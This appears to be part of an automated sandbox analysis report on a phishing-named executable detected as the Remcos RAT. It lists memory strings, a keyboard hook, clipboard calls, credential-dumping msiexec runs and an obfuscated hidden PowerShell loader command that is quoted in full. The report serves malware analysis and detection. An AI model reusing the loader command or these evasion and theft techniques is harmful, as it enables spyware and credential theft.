              Source: msiexec.exe, msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cNU
              Source: msiexec.exe, 0000000A.00000002.3297790419.000000000296F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: msiexec.exe, 0000000A.00000002.3297767350.000000000293C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.cD
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_deskt
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: msiexec.exe, 0000000A.00000002.3298254993.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3297488706.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: order CF08093-24.exe
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exeJump to dropped file
              Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004016FD NtdllDefWindowProc_A,11_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004017B7 NtdllDefWindowProc_A,11_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_00406C5F0_2_00406C5F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235FB5C16_2_235FB5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_236071946_2_23607194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B04010_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043610D10_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044731010_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A49010_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040755A10_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C56010_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B61010_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044D6C010_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004476F010_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B87010_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044081D10_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041495710_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004079EE10_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407AEB10_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044AA8010_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00412AA910_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B7410_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B0310_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044BBD810_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404BE510_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404C7610_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00415CFE10_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00416D7210_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D3010_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D8B10_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E8F10_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040503811_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041208C11_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004050A911_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040511A11_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043C13A11_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004051AB11_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044930011_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040D32211_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A4F011_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043A5AB11_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041363111_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044669011_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A73011_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004398D811_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004498E011_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A88611_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043DA0911_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00438D5E11_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00449ED011_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041FE8311_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00430F5411_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004050C212_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004014AB12_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040513312_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004051A412_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040124612_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040CA4612_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040523512_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004032C812_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040168912_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00402F6012_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: order CF08093-24.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/17@1/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,10_2_004182CE
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,12_2_00410DE1
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004148B6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
              Source: C:\Users\user\Desktop\order CF08093-24.exeFile created: C:\Users\user\AppData\Local\Temp\nsvB59B.tmpJump to behavior
              Source: order CF08093-24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\order CF08093-24.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000006.00000002.4486764970.0000000023A40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000A.00000003.3297297426.00000000048B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3298515325.00000000048BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: order CF08093-24.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\order CF08093-24.exeFile read: C:\Users\user\Desktop\order CF08093-24.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33236
              Source: unknownProcess created: C:\Users\user\Desktop\order CF08093-24.exe "C:\Users\user\Desktop\order CF08093-24.exe"
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"Jump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeSection loaded: coremessaging.dllJump to behavior
